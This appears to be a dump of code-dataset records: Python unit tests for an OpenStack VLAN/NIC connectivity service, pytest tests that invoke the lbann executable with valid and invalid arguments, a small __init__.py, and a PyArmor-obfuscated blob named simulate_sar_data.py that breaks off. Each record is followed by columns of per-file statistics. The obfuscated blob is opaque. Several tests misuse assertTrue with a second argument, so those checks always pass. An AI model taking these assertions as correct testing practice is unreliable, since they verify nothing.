self.connectivity_service.network_service.get_network_with_segmentation_id = Mock(
return_value=mock_get_network_with_vlanid_result)
self.connectivity_service.detach_nic_from_instance_action_result = Mock(return_value='Success')
self.connectivity_service.network_service.remove_subnet_and_net = Mock()
results = self.connectivity_service.remove_vlan_actions(openstack_session=self.os_session,
cp_resource_model=mock_cp_resource_model,
vlan_actions=test_vlan_actions,
logger=self.mock_logger)
self.connectivity_service.network_service.remove_subnet_and_net.assert_called_with(
openstack_session=self.os_session,
network=mock_get_network_with_vlanid_result,
logger=self.mock_logger)
self.assertTrue(results, ['Success', 'Success'])
def test_set_fail_results(self):
mock_action_resource_info = ConnectivityActionResourceInfo(deployed_app_resource_name='test_app',
actionid='test-actionid',
vm_uuid='test-vm-uuid',
interface_ip='test-ip',
interface_port_id='test-port-id',
interface_mac='test-mac')
mock_values = [mock_action_resource_info]
mock_failure_text = 'test failure test'
mock_action_type = 'test action'
results = self.connectivity_service.set_fail_results(values=mock_values,
failure_text=mock_failure_text,
action_type=mock_action_type,
logger=None)
result = results[0]
self.assertTrue(result.actionId, 'test-actionid')
self.assertTrue(result.errorMessage, mock_failure_text)
self.assertFalse(result.success)
self.assertTrue(result.type, mock_action_type)
def test_get_action_result_info_setvlan(self):
test_action_dict = {'customActionAttributes': [{'attributeName': 'VM_UUID', 'attributeValue': 'test-vm-uuid'}],
'connectorAttributes' : ''}
test_action_obj = DeployDataHolder(test_action_dict)
mock_deployed_app_resource_name = 'test app name'
mock_actionid = 'test-actionid'
result = self.connectivity_service.get_action_resource_info(deployed_app_resource_name=mock_deployed_app_resource_name,
actionid=mock_actionid,
action=test_action_obj)
self.assertTrue(result.vm_uuid, 'test-vm-uuid')
self.assertFalse(result.iface_ip)
self.assertFalse(result.interface_port_id)
self.assertFalse(result.interface_mac)
def test_get_action_result_info_removevlan(self):
test_action_dict = {'customActionAttributes': [{'attributeName': 'VM_UUID', 'attributeValue': 'test-vm-uuid'}],
'connectorAttributes' : [{'attributeName': 'Interface',
'attributeValue': '{"ip_address":"test_ip" , \
"mac_address": "test_mac","port_id":"test_port_id"}'}]}
test_action_obj = DeployDataHolder(test_action_dict)
print test_action_obj.connectorAttributes[0].attributeValue
print jsonpickle.loads(test_action_obj.connectorAttributes[0].attributeValue)
mock_deployed_app_resource_name = 'test app name'
mock_actionid = 'test-actionid'
result = self.connectivity_service.get_action_resource_info(deployed_app_resource_name=mock_deployed_app_resource_name,
actionid=mock_actionid,
action=test_action_obj)
self.assertEqual(result.vm_uuid, 'test-vm-uuid')
self.assertEqual(result.iface_ip, 'test_ip')
self.assertEqual(result.interface_port_id, 'test_port_id')
self.assertTrue(result.interface_mac, 'test_mac')
def test_attach_nic_to_instance_action_result_failure(self):
test_action_resource_info = ConnectivityActionResourceInfo(deployed_app_resource_name='test app name',
actionid='test actionid',
vm_uuid='test-vm-uuid',
interface_ip='test_ip',
interface_port_id='test_port_id',
interface_mac='test mac')
# self.connectivity_service.instance_service = Mock()
self.connectivity_service.instance_service.attach_nic_to_net = Mock(return_value=None)
result = self.connectivity_service.attach_nic_to_instance_action_result(openstack_session=self.os_session,
action_resource_info=test_action_resource_info,
net_id='test netid',
logger=self.mock_logger)
self.connectivity_service.instance_service.attach_nic_to_net.assert_called_with(openstack_session=self.os_session,
instance_id='test-vm-uuid',
net_id='test netid',
logger=self.mock_logger)
self.assertEquals(result.actionId, 'test actionid')
self.assertEqual(result.success, 'False')
def test_attach_nic_to_instance_action_result_success(self):
test_action_resource_info = ConnectivityActionResourceInfo(deployed_app_resource_name='test app name',
actionid='test actionid',
vm_uuid='test-vm-uuid',
interface_ip='test_ip',
interface_port_id='test_port_id',
interface_mac='test mac')
# self.connectivity_service.instance_service = Mock()
self.connectivity_service.instance_service.attach_nic_to_net = Mock(return_value=True)
result = self.connectivity_service.attach_nic_to_instance_action_result(openstack_session=self.os_session,
action_resource_info=test_action_resource_info,
net_id='test netid',
logger=self.mock_logger)
self.connectivity_service.instance_service.attach_nic_to_net.assert_called_with(openstack_session=self.os_session,
instance_id='test-vm-uuid',
net_id='test netid',
logger=self.mock_logger)
self.assertEquals(result.actionId, 'test actionid')
self.assertEqual(result.success, 'True')
def test_detach_nic_from_instance_action_result_failure(self):
test_action_resource_info = ConnectivityActionResourceInfo(deployed_app_resource_name='test app name',
actionid='test actionid',
vm_uuid='test-vm-uuid',
interface_ip='test_ip',
interface_port_id='test_port_id',
interface_mac='test mac')
# self.connectivity_service.instance_service = Mock()
self.connectivity_service.instance_service.detach_nic_from_instance = Mock(return_value=None)
result = self.connectivity_service.detach_nic_from_instance_action_result(openstack_session=self.os_session,
action_resource_info=test_action_resource_info,
net_id='test netid',
logger=self.mock_logger)
self.connectivity_service.instance_service.detach_nic_from_instance.assert_called_with(
openstack_session=self.os_session,
instance_id='test-vm-uuid',
port_id='test_port_id',
logger=self.mock_logger)
self.assertEquals(result.actionId, 'test actionid')
self.assertEqual(result.success, 'False')
def test_detach_nic_from_instance_action_result_success(self):
test_action_resource_info = ConnectivityActionResourceInfo(deployed_app_resource_name='test app name',
actionid='test actionid',
vm_uuid='test-vm-uuid',
interface_ip='test_ip',
interface_port_id='test_port_id',
interface_mac='test mac')
# self.connectivity_service.instance_service = Mock()
self.connectivity_service.instance_service.detach_nic_from_instance = Mock(return_value=True)
result = self.connectivity_service.detach_nic_from_instance_action_result(openstack_session=self.os_session,
action_resource_info=test_action_resource_info,
net_id='test netid',
logger=self.mock_logger)
self.connectivity_service.instance_service.detach_nic_from_instance.assert_called_with(
openstack_session=self.os_session,
instance_id='test-vm-uuid',
port_id='test_port_id',
logger=self.mock_logger)
self.assertEquals(result.actionId, 'test actionid')
self.assertEqual(result.success, 'True')
def test_perform_apply_connectivity_setvlan(self):
test_connection_request = '''{"driverRequest":{
"actions":[
{"type":"setVlan",
"actionId":"test actionID",
"actionTarget": {"fullName": "test full name"},
"connectionParams" : {"vlanId" : 42}
}
]}
}'''
mock_action_resource_info = Mock()
self.connectivity_service.get_action_resource_info = Mock(return_value=mock_action_resource_info)
self.connectivity_service.set_vlan_actions = Mock(return_value=['Success'])
actionResults = self.connectivity_service.perform_apply_connectivity(openstack_session=self.os_session,
connection_request=test_connection_request,
cp_resource_model=Mock(),
logger=self.mock_logger)
self.assertEqual(actionResults, ['Success'])
def test_perform_apply_connectivity_removevlan(self):
    """A removeVlan driver request is dispatched to remove_vlan_actions and its results returned."""
    test_connection_request = '''{"driverRequest":{
        "actions":[
           {"type":"removeVlan",
            "actionId":"test actionID",
            "actionTarget": {"fullName": "test full name"},
            "connectionParams" : {"vlanId" : 42}
           }
        ]}
        }'''
    # Stub resource resolution and the removeVlan handler itself.
    fake_resource_info = Mock()
    self.connectivity_service.get_action_resource_info = Mock(return_value=fake_resource_info)
    self.connectivity_service.remove_vlan_actions = Mock(return_value=['Success'])
    actionResults = self.connectivity_service.perform_apply_connectivity(
        openstack_session=self.os_session,
        connection_request=test_connection_request,
        cp_resource_model=Mock(),
        logger=self.mock_logger)
    self.assertEqual(actionResults, ['Success'])
| 61.358663
| 129
| 0.524744
| 1,749
| 20,187
| 5.61235
| 0.068611
| 0.096781
| 0.114813
| 0.03586
| 0.859311
| 0.841076
| 0.812143
| 0.778932
| 0.764772
| 0.739914
| 0
| 0.001684
| 0.411651
| 20,187
| 328
| 130
| 61.545732
| 0.824787
| 0.010254
| 0
| 0.657258
| 0
| 0
| 0.116095
| 0.003254
| 0
| 0
| 0
| 0
| 0.145161
| 0
| null | null | 0
| 0.024194
| null | null | 0.008065
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5bde732c262786269ad527a7e301535fb8b3a033
| 5,757
|
py
|
Python
|
bamboo/unit_tests/test_unit_lbann_invocation.py
|
anmolpau/lbann
|
90c3dd0a7be644a6824ee74d59dbdbc1dfe2977e
|
[
"Apache-2.0"
] | null | null | null |
bamboo/unit_tests/test_unit_lbann_invocation.py
|
anmolpau/lbann
|
90c3dd0a7be644a6824ee74d59dbdbc1dfe2977e
|
[
"Apache-2.0"
] | null | null | null |
bamboo/unit_tests/test_unit_lbann_invocation.py
|
anmolpau/lbann
|
90c3dd0a7be644a6824ee74d59dbdbc1dfe2977e
|
[
"Apache-2.0"
] | null | null | null |
import sys
sys.path.insert(0, '../common_python')
import tools
import os, sys
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_no_params_bad' --exes=<executable>
def test_unit_no_params_bad(cluster, exes):
    """Invoking lbann with no parameters at all must exit with a nonzero code."""
    # `exes` may be a per-compiler dict or a single executable path.
    exe = exes['gcc7'] if isinstance(exes, dict) else exes
    sys.stderr.write('TESTING: run lbann with no params; lbann should throw exception\n')
    command = tools.get_command(
        cluster=cluster, executable=exe, exit_after_setup=True)
    assert os.system(command) != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_one_model_bad' --exes=<executable>
def test_unit_one_model_bad(cluster, exes):
    """A model alone (no optimizer, no reader) must make lbann exit nonzero."""
    # `exes` may be a per-compiler dict or a single executable path.
    exe = exes['gcc7'] if isinstance(exes, dict) else exes
    sys.stderr.write('TESTING: run lbann with no optimizer or reader; lbann should throw exception\n')
    command = tools.get_command(
        cluster=cluster, executable=exe, exit_after_setup=True,
        model_path='prototext/model_mnist_simple_1.prototext')
    assert os.system(command) != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_two_models_bad' --exes=<executable>
def test_unit_two_models_bad(cluster, exes):
    """Two models but no optimizer or reader must make lbann exit nonzero."""
    # `exes` may be a per-compiler dict or a single executable path.
    exe = exes['gcc7'] if isinstance(exes, dict) else exes
    sys.stderr.write('TESTING: run lbann with two models but no optimizer or reader; lbann should throw exception\n')
    command = tools.get_command(
        cluster=cluster, executable=exe, exit_after_setup=True,
        model_path='{prototext/model_mnist_simple_1.prototext,prototext/model_mnist_simple_1.prototext}')
    assert os.system(command) != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_two_models_bad2' --exes=<executable>
def test_unit_two_models_bad2(cluster, exes):
    """A model-list path missing its opening '{' must make lbann exit nonzero."""
    # `exes` may be a per-compiler dict or a single executable path.
    exe = exes['gcc7'] if isinstance(exes, dict) else exes
    sys.stderr.write('TESTING: run lbann with two models with missing {; lbann should throw exception\n')
    command = tools.get_command(
        cluster=cluster, executable=exe, exit_after_setup=True,
        model_path='prototext/model_mnist_simple_1.prototext,prototext/model_mnist_simple_1.prototext}')
    assert os.system(command) != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_missing_optimizer' --exes=<executable>
def test_unit_missing_optimizer(cluster, exes):
    """Models plus a data reader but no optimizer must make lbann exit nonzero."""
    # `exes` may be a per-compiler dict or a single executable path.
    exe = exes['gcc7'] if isinstance(exes, dict) else exes
    sys.stderr.write('TESTING: run lbann with two models, reader, but no optimizer; lbann should throw exception\n')
    command = tools.get_command(
        cluster=cluster,
        executable=exe,
        data_reader_path='prototext/data_reader_mnist.prototext',
        data_filedir_default='/p/lscratchh/brainusr/datasets/MNIST',
        exit_after_setup=True,
        model_path='{prototext/model_mnist_simple_1.prototext,prototext/model_mnist_simple_1.prototext}')
    assert os.system(command) != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_missing_reader' --exes=<executable>
def test_unit_missing_reader(cluster, exes):
    """lbann given two models and an optimizer but no data reader must fail.

    Builds a command without a data_reader_path and asserts a nonzero exit.
    """
    if isinstance(exes, dict):
        exe = exes['gcc7']
    else:
        exe = exes
    # BUG FIX: the original message said "reader, but no reader"; this test
    # actually supplies an optimizer and omits the reader.
    sys.stderr.write('TESTING: run lbann with two models, optimizer, but no reader; lbann should throw exception\n')
    model_path = '{prototext/model_mnist_simple_1.prototext,prototext/model_mnist_simple_1.prototext}'
    optimizer_path = 'prototext/opt_sgd.prototext'
    command = tools.get_command(
        cluster=cluster, executable=exe, exit_after_setup=True,
        model_path=model_path, optimizer_path=optimizer_path)
    return_code = os.system(command)
    assert return_code != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_bad_params' --exes=<executable>
def test_unit_bad_params(cluster, exes):
    """An ill-formed flag (single '-' instead of '--') must make lbann exit nonzero."""
    # `exes` may be a per-compiler dict or a single executable path.
    exe = exes['gcc7'] if isinstance(exes, dict) else exes
    sys.stderr.write('TESTING: run lbann with ill-formed param (missing -) lbann should throw exception\n')
    (command_allocate, command_run, _, _) = tools.get_command(
        cluster=cluster, executable=exe, return_tuple=True)
    command_string = '%s%s %s -exit_after_setup --reader=prototext/data_reader_mnist.prototext --model={prototext/model_mnist_simple_1.prototext,prototext/model_mnist_simple_1.prototext} --optimizer=prototext/opt_sgd.prototext' % (command_allocate, command_run, exe)
    assert os.system(command_string) != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_should_work' --exes=<executable>
def test_unit_should_work(cluster, exes):
    """lbann given models, a data reader, and an optimizer should set up cleanly.

    This is the success-path test: a fully-specified invocation is expected to
    exit with return code 0.
    """
    if isinstance(exes, dict):
        exe = exes['gcc7']
    else:
        exe = exes
    sys.stderr.write('TESTING: run lbann with two models, reader, and optimizer; lbann should NOT throw exception\n')
    model_path = '{prototext/model_mnist_simple_1.prototext,prototext/model_mnist_simple_1.prototext}'
    data_reader_path = 'prototext/data_reader_mnist.prototext'
    optimizer_path = 'prototext/opt_sgd.prototext'
    command = tools.get_command(
        cluster=cluster, executable=exe, data_reader_path=data_reader_path,
        data_filedir_default='/p/lscratchh/brainusr/datasets/MNIST',
        exit_after_setup=True, model_path=model_path,
        optimizer_path=optimizer_path)
    return_code = os.system(command)
    # BUG FIX: this success-path test asserted `!= 0`, which contradicts the
    # message above ("should NOT throw exception") — a clean setup must exit 0.
    assert return_code == 0
| 44.976563
| 266
| 0.731631
| 810
| 5,757
| 4.930864
| 0.102469
| 0.048072
| 0.061843
| 0.081372
| 0.927892
| 0.883075
| 0.834001
| 0.80646
| 0.80646
| 0.80646
| 0
| 0.008351
| 0.167969
| 5,757
| 127
| 267
| 45.330709
| 0.82547
| 0.151815
| 0
| 0.708738
| 0
| 0.009709
| 0.324169
| 0.170291
| 0
| 0
| 0
| 0
| 0.07767
| 1
| 0.07767
| false
| 0
| 0.029126
| 0
| 0.106796
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5bea1da403d7803cc8cefdd221618192d395aaea
| 140
|
py
|
Python
|
scripts/__init__.py
|
tth030/SM_ESR_isostasy
|
fbd2ac586e8e31dd18a0988181514bc2fff7f08a
|
[
"MIT"
] | null | null | null |
scripts/__init__.py
|
tth030/SM_ESR_isostasy
|
fbd2ac586e8e31dd18a0988181514bc2fff7f08a
|
[
"MIT"
] | null | null | null |
scripts/__init__.py
|
tth030/SM_ESR_isostasy
|
fbd2ac586e8e31dd18a0988181514bc2fff7f08a
|
[
"MIT"
] | null | null | null |
from .scripts_geodyn1d import *
from .plot_data import *
from .plot_profiles import *
from .book_lith import *
from .book_deltarho import *
| 23.333333
| 31
| 0.785714
| 20
| 140
| 5.25
| 0.5
| 0.380952
| 0.266667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008333
| 0.142857
| 140
| 5
| 32
| 28
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
752a31e25531a75adf562c9743298c0fcaabd789
| 48,495
|
py
|
Python
|
legacy/functional_code/backprojection/simulate_sar_data.py
|
jjimmykang/bwsi-backprojection
|
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
|
[
"MIT"
] | 1
|
2020-02-09T19:09:27.000Z
|
2020-02-09T19:09:27.000Z
|
legacy/functional_code/backprojection/simulate_sar_data.py
|
jjimmykang/bwsi-backprojection
|
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
|
[
"MIT"
] | null | null | null |
legacy/functional_code/backprojection/simulate_sar_data.py
|
jjimmykang/bwsi-backprojection
|
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
|
[
"MIT"
] | null | null | null |
__pyarmor__(__name__, __file__, b'\xe4\x50\x8c\x64\x26\x42\xd6\x01\x92\x66\xef\x19\xf6\xf6\xdc\x27\x16\xfe\x75\x04\x29\xbd\xb6\xbc\xc7\x79\xa1\xc5\x05\x31\xe3\x6d\x2b\x3d\x7e\xd9\x90\x07\x71\xd3\x44\x59\x4e\xf5\xdc\xde\xb5\xb7\x72\xac\x15\x3a\xaf\x50\xae\x13\x28\xde\x30\x1b\xbe\x39\xaa\xe9\x1c\x07\x04\x91\x4d\x31\x7a\x2f\xde\xfc\xa1\xad\x16\xd3\xf1\xb4\x44\xb0\x12\x31\xab\xf7\x4b\xc0\x38\xdb\xda\x22\x54\xe9\xbd\xfa\x25\xc2\xde\xea\xe7\x3a\xe4\xeb\x23\x2e\xa6\x21\xd0\x55\x41\x04\x08\xba\xb9\x54\xda\xa7\xd9\xd1\x82\xef\x36\x40\xdf\x5b\xdd\xe8\x69\x8d\x20\x4e\xda\x5a\xf0\xac\xfa\x75\x48\x62\xc5\xb9\x57\x41\xee\x84\xab\x36\x60\x5b\xa7\xd4\x8f\xa1\x3d\x68\x28\x70\xf9\xc0\xd3\xda\xda\xb6\x00\x7b\x0e\x1c\x43\xcd\xab\x1c\x49\xe6\x51\x7f\xb3\x6d\xce\x27\x48\xc7\xd9\xa6\xc6\x73\x8c\x82\x66\x91\x56\x2a\xa7\x08\x6b\xb1\x63\x46\xda\xb7\x90\x9d\x3b\xac\x56\xc7\x80\xbc\xd0\x91\x8b\xef\x82\x21\x59\x71\xda\x64\x1f\x5f\x3a\xc3\x9c\x98\xd9\x45\xdd\x0e\x26\x1f\x50\x38\x44\xd1\xda\xfb\x62\x8b\x71\x4a\x7f\xb1\xc9\xf9\x67\x23\x6f\xf7\xe2\x75\x98\x93\xa7\x43\x62\xbe\x04\x73\xc0\x27\xd6\xec\x6b\xe3\xe6\x0e\x27\xb3\x0d\x49\xf2\xf7\x1f\x13\x8b\xfb\xe7\xad\xa2\x43\xf3\x80\xda\x48\x8a\xc0\x27\x7c\x07\xc7\x0a\x8b\x89\xe0\x87\xc3\x4c\xa7\xcb\xbf\x48\x87\xb3\xe6\x41\x16\x92\xb0\xc6\x11\xb4\xc7\xa3\xde\xcc\x65\x70\x15\x5e\x14\xf5\x71\xb4\x75\xb2\xde\x53\xe4\x74\x40\xe0\x51\x31\x50\xb0\x88\x7a\x1f\xe1\x6e\x35\xca\x23\x19\xb7\x39\xf7\xeb\xaa\x1e\xb7\xcb\xb5\x9a\x0a\x4f\x6a\x7f\xf8\x13\x58\xac\x88\x51\xf6\xac\x84\x93\x99\x6b\xea\x12\xcc\x08\xd9\x50\x3e\x66\x07\x9b\x01\x33\xc7\x35\xf6\x1b\x6a\x59\xe2\x49\x8c\xd7\x22\x05\xa6\x17\x67\x23\x9b\x5f\x7a\x46\x13\x41\x51\xb1\x9d\xcc\x67\x93\x20\xa5\x7d\xbb\x94\x64\x6d\x42\x3b\xc2\xf8\xf0\x6b\xc3\xb8\xdf\x24\x5b\xc5\x30\x5d\x0f\x69\x9f\x7d\x7b\x29\x80\x00\x9c\x51\xff\x68\xff\xb6\xd5\x9b\x05\xaa\x91\xb6\x21\xba\x16\x5d\xe3\xd0\x6a\xdd\x1b\x8d\x67\x5b\xdb\x02\x1b\xa8\x8a\x5c\x03\x47\xcc\x13\x8d\x6f\x29\xce\xbc\xc0\x65\x33\xe5\x61\xbf\x92\xe8\xef\x81\xe8\x1e\xfa\x
7f\xcc\x99\x20\x7f\xbb\xbc\x5f\x45\x42\x1a\x3f\x56\xbf\x02\x8e\xb6\xff\x0d\xdf\x3a\x08\xb9\x3d\x79\x7e\x83\xbe\xe1\xfd\xcb\xe3\x1b\x05\xdb\xce\x22\x3c\x71\xd9\x6e\xbe\x7b\xc4\x94\xae\x6a\x82\xe5\xd9\xf7\x9a\xcd\x67\x9f\xc8\x97\x26\x13\x38\xaf\x28\x97\x7f\x07\xa3\x89\xd4\x0d\x96\x07\xf4\x78\xab\x5a\xeb\x6a\xcd\xd7\x6a\x54\x8c\x6e\xd7\x55\x7f\x53\x12\x4b\x8d\x38\xe1\x09\xe0\x68\x9a\xe6\x3d\x5c\x71\x63\x6f\x31\xaa\xd0\x46\x99\x69\x6f\x6e\x45\x40\x35\x1c\xc3\x87\xba\x03\x98\xf1\xac\x95\xd9\xa5\xa9\x62\x3a\xde\x30\xe6\x1c\xef\xb0\x25\x18\xfe\xfa\xe2\x25\x61\xc4\x2f\x4d\xd7\xd4\xc4\x50\x9a\xdd\xcf\x9f\xab\x1a\x0d\xb5\x1a\xff\x6f\xd7\xe5\x35\x43\x82\x23\xbc\x6e\x25\x3b\xee\xb6\xfe\x35\xd0\x2e\x08\xd2\x88\x25\x96\x2a\x84\xc6\xc9\x16\xea\x24\x77\xdc\x63\x27\x47\x48\xc8\x18\x6c\x83\x8c\x75\x15\x49\x81\xd4\xcc\x47\x34\x98\xd9\x1b\xd3\x5d\x87\xf0\x51\xb3\x27\x64\x32\x41\x08\x2a\xf2\xd9\xa6\x8e\x33\x86\x23\xb6\xdd\xf1\x0b\xde\x0e\x26\x7e\x4a\x65\xb8\xa1\x4d\x0e\x87\x04\x19\xc3\x84\xbf\xa2\x80\x91\x12\x25\xfb\x8d\xf7\xb5\x72\xb6\x11\x9e\x3a\x08\x43\xdd\x0d\xec\x6a\xb0\xcd\x1d\x2d\x3a\x90\x22\x79\x52\x2b\x44\x22\x22\x14\x5f\xc3\x2b\x0f\xcb\xbe\x27\x3a\x82\x20\x90\x0c\xb4\xdf\xd7\x7e\xb3\xad\x70\xcf\xab\x59\x5f\xa0\xf5\x96\x19\x60\x35\x32\xb6\x65\x5b\xe8\x76\x34\xaa\xbf\x6e\x4b\x4d\xa8\x50\x9b\x3d\x2a\x55\xdf\xa5\xdd\xf1\xa6\xf3\x11\xbe\x54\x3a\x59\x45\xae\x65\x0b\x71\x1a\xb9\x41\xd0\x26\xdf\xdf\xdd\x45\xdf\x49\x22\x29\xe7\xa2\x8d\x10\xc6\x75\xab\x11\x1e\x4e\x34\x93\xbe\x01\xe7\x4d\xd9\x34\x0d\xbf\x32\x8f\x52\xe3\x4e\x6f\x1c\xca\x8e\xb6\x62\x4b\x6e\xf8\x56\x7d\x75\xf0\x48\x9f\x11\xfc\x00\xf5\xd7\x9b\xbf\x3c\x9b\xfa\x68\xba\x2f\xd0\x97\xb7\xc0\xe3\x8d\xe0\x7f\x95\xb6\x60\x55\xe0\x30\xf9\xc5\x64\x1b\x84\xe7\x45\x27\x70\x65\xa8\x02\xcc\xcc\x94\x76\x44\xc7\x87\x4e\x7e\xe5\x6b\x74\xe0\x0a\xc8\x98\xd4\xc3\x4d\x6b\xfc\xd9\x64\x9f\x2d\x18\x2c\xd0\x86\x78\xe1\xa8\x1c\x18\x1d\x0c\x2b\x8d\x89\x35\x9f\x7d\x5b\x31\xb0\xab\x68\x0f\x29\x38\x14\xd9\x13\x28\x00\x7a\x18\x6e\x1e\xb6\xd4\x78\xe6\x25\x
28\xae\xb3\x23\x18\x8a\x4f\x99\x50\x23\x6f\x5a\xa4\x72\xb4\x45\x8f\x6c\xdc\x87\x2d\x6f\xcb\x48\x06\x7a\x56\xe1\xd9\x4b\x78\x04\x13\xf5\x25\xf9\xd3\x7e\x1d\x1f\xd0\x8d\x30\xd6\x20\xa0\x2d\xc0\x7d\x6e\xf4\x06\x13\xa7\xc4\x8b\xc4\xae\x52\xa0\x4a\x3a\x6b\xee\x36\xe2\x5e\x01\xaa\xdd\x5b\x66\xef\x66\xbc\x7b\x96\x38\xca\x88\x22\x6c\x62\xfb\xba\xff\xa2\xa5\xe1\x07\xa3\x69\xd4\xb2\xcf\x35\xa9\x26\x61\x47\x83\x46\x44\x9d\x6b\x69\xb1\x15\xfe\x83\xe5\x19\xe2\xf5\x4d\xe8\xe4\x69\xa5\xff\x13\xa2\xd0\x4c\xf9\x80\xf9\x25\x26\x93\xaf\x75\xaa\xf1\xcd\x40\xf9\x94\x86\xe4\x3b\x1e\x70\xdb\xdd\xa8\x77\x35\xa2\xa0\xe8\xdd\xa3\x3d\xb9\x1a\xb1\xa9\xf8\x3f\xd8\x67\x03\x73\x49\x67\x40\x9e\xd7\x4a\xa1\xc7\x7b\xb7\xaa\x44\x01\xcc\x8c\x0f\x5d\xd8\x5b\xe6\x4f\x2e\x6a\x75\xf9\x32\xc2\x5c\x7c\x69\xf3\x88\x79\x57\x72\x32\xaa\xa5\x94\xef\xa7\x73\x20\xca\x26\x54\xd8\xd0\xb0\xbf\xeb\x84\xad\x99\x6c\xed\xca\x06\xe9\xcf\xcc\xae\x82\x46\xff\xc3\xfe\x02\xa9\x73\xb1\x44\xe0\xf1\xf8\xea\x03\xe4\xb8\x41\xe7\xef\xd5\x0a\x52\xf4\xae\xb8\x74\x9e\x34\x97\x60\x40\xcd\x6b\x2c\x23\x13\x8e\x37\x0e\x34\x39\x35\xf2\x6a\x39\x22\x0d\xd2\x9e\x9e\x94\x22\x42\xd4\xac\x3b\xaa\x1e\x71\xf3\x5f\x46\xd6\xf0\x2e\x8a\x04\x82\xa2\xbb\x94\x28\x56\xb4\x9f\x97\xd1\x69\x88\x40\xfe\xe2\xa1\xe6\x24\x94\x34\xaf\x4d\xba\x21\x23\x4b\x26\x21\x44\x76\x26\x04\x89\xb2\x95\x80\xa1\xf5\xaa\x46\x3b\xcc\xad\xbb\xfc\x3a\xdb\x5e\x78\xf3\xf9\xcf\x0a\x2c\xc9\xde\x30\x97\x62\x2c\xde\xf7\x5b\x60\x58\x3e\x6e\xb7\xb3\x09\x95\xba\xda\xe7\x95\x5a\x1f\xc1\xd7\xda\xe7\xe4\xe7\xfb\xf8\x53\x47\x81\xc5\x98\xea\x74\x61\xbe\xed\xa3\x67\x05\x5e\x0e\xa8\xfd\x11\x0c\x59\xee\xf2\x82\xe3\x13\x36\xd8\xdb\xab\xb1\x6e\x41\x49\x69\xac\x1a\xca\x15\x61\x3b\xb2\xa6\xf7\xc6\x0c\xff\xfe\xe9\xb3\x55\x0a\xee\xc9\xbc\xd5\x38\xa8\x0d\x24\x3f\xbb\x8d\x1f\x70\xf8\xe9\x72\xfd\x82\xf0\xeb\xc0\xfa\x12\xc7\x83\x19\xa6\xd5\x7e\x76\x71\x0d\xe1\x97\x96\x1a\x91\xb4\x71\xa5\xc3\x28\x68\xc7\xf5\x65\x91\x10\x15\x83\xa6\x46\x2a\x34\xa0\x03\xb1\x11\x63\x37\x40\x24\x44\x22\x8c\xc2\xd8\x46\x45\xcc\x
c1\x6c\xa3\xcc\x0c\x32\x20\x2e\xd7\x61\x01\x5f\x37\xaa\x91\x6b\x66\xd9\x10\x78\xe7\xea\x58\xf3\xaa\xaf\xb9\x39\x31\x2a\xe4\x53\x16\x79\x8a\x17\x1d\x00\xc3\x0a\x30\x2b\x90\xc0\xd7\xc0\x6b\xcb\x22\x96\xa4\x40\xbd\x07\x1c\xcc\x88\x4f\x4b\x72\x00\x2b\x9f\xc9\x55\x2f\x33\xb6\x7c\xd2\x1f\x86\xc5\x9b\xc1\x8e\xe3\xa3\x6e\x05\x8c\xbc\x07\x26\x6c\xa9\x98\x8a\x28\x06\xb4\xb4\x53\xfa\xc6\x9b\xdd\xe7\x60\x46\xb3\x16\x75\xa8\x22\x14\xcb\x19\xd6\x9d\xad\x86\x21\xff\xa8\x6e\x9c\x62\x76\x76\x0c\x53\xc1\x74\x45\xcf\x13\xbc\x5b\x69\x0e\xfa\x84\x40\xd0\xff\x4e\x0b\xee\x4f\x71\x74\xd6\x97\x24\x5c\xbb\xc7\x09\xd6\x32\x07\xf1\xc4\x89\x1e\x11\x72\x76\x4e\xfa\x4a\x39\xdc\x7c\xfd\xb0\xdf\xda\xd9\x9b\x94\xab\xac\xa5\xc6\x0f\x64\x9e\xfa\x2a\x4d\xf6\x0f\x92\x30\x9f\x45\x75\xce\x07\x72\x79\xe0\xdf\x3d\x8d\xb2\x4a\x0d\x2b\x3c\xb9\x49\x75\xef\x3b\xed\xe2\x9b\xbf\xc7\x88\x9f\xcd\xd4\xaa\x4c\x9f\x26\x47\xd3\x5d\x6e\xf5\xba\x96\x60\x6a\x55\xa5\x8d\xf8\x64\xfd\xa4\x26\xed\x0f\x59\xe1\x0f\xd8\x7d\x13\xfc\xc7\x82\x81\x7c\x41\x83\x52\x93\xcc\x03\xf0\x5c\xff\xa1\xed\xe2\x29\xb2\xf5\x51\x65\xd0\x5d\x68\xe7\xa1\x2f\x35\x5a\xc4\xcc\xe8\xb0\x4f\x3c\x82\x78\xf8\x69\x51\xdc\xd0\xe4\x25\x35\xf7\x4a\x92\xec\x99\x89\xb4\x08\xa5\x6f\x94\xf7\x61\x26\x9b\x42\xa7\xb6\x